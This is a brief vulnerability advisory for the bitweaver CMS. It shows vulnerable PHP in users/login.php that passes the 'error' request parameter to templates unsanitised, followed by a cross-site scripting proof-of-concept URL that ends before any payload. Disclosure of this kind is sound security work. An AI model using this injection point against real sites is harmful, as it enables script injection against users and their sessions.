Multiple vulnerability in biweaver CMS
Author : KaDaL-X
Email : king_purba@yahoo.co.uk
Site : http://kandangjamur.net/
1. XSS
--------
Vulneral code in users/login.php :
if( !empty( $_REQUEST['error'] ) ) {
$gBitSmarty->assign( 'error', $_REQUEST['error'] );
}
PoC :
http://xxx/bitweaver/users/login.php?error=